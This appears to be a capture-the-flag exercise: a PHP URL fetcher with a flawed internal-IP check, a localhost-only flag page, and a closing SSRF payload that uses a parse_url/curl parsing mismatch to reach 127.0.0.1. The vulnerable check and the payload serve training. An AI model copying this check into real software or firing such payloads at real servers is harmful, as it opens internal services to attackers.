1. // index.php
    2. <?php
    3. function check_inner_ip($url)
    4. {
    5.     $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
    6.     if (!$match_result){
    7.         die('url fomat error1');
    8.     }
    9.     try{
    10.         $url_parse=parse_url($url);
    11.     }
    12.     catch(Exception $e){
    13.         die('url fomat error2');
    14.     }
    15.     $hostname=$url_parse['host'];
    16.     $ip=gethostbyname($hostname);
    17.     $int_ip=ip2long($ip);
    18.     return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16 || ip2long('0.0.0.0')>>24 == $int_ip>>24;
    19. }
    21. function safe_request_url($url)
    22. {
    23.     if (check_inner_ip($url)){
    24.         echo $url.' is inner ip';
    25.     }
    26.     else{
    27.         $ch = curl_init();
    28.         curl_setopt($ch, CURLOPT_URL, $url);
    29.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    30.         curl_setopt($ch, CURLOPT_HEADER, 0);
    31.         $output = curl_exec($ch);
    32.         $result_info = curl_getinfo($ch);
    33.         if ($result_info['redirect_url']){
    34.             safe_request_url($result_info['redirect_url']);
    35.         }
    36.         curl_close($ch);
    37.         var_dump($output);
    38.     }
    39. }
    41. $url = $_POST['url'];
    42. if(!empty($url)){
    43.     safe_request_url($url);
    44. }
    45. else{
    46.     highlight_file(__file__);
    47. }
    48. //flag in flag.php 
    50. ?>
    // flag.php
<?php
if (! function_exists('real_ip') ) {
    function real_ip()
    {
        $ip = $_SERVER['REMOTE_ADDR'];
        if (is_null($ip) && isset($_SERVER['HTTP_X_FORWARDED_FOR']) && preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) {
            foreach ($matches[0] AS $xip) {
                if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {
                    $ip = $xip;
                    break;
                }
            }
        } elseif (is_null($ip) && isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (is_null($ip) && isset($_SERVER['HTTP_CF_CONNECTING_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CF_CONNECTING_IP'])) {
            $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
        } elseif (is_null($ip) && isset($_SERVER['HTTP_X_REAL_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_X_REAL_IP'])) {
            $ip = $_SERVER['HTTP_X_REAL_IP'];
        }
        return $ip;
    }
}
$rip = real_ip();
if($rip === "127.0.0.1")
    die("HRCTF{SSRF_can_give_you_flag}");
else
    die("You IP is {$rip} not 127.0.0.1");
?>

    payload:
    url=http://foo@127.0.0.1:80@google.com/day16/flag.php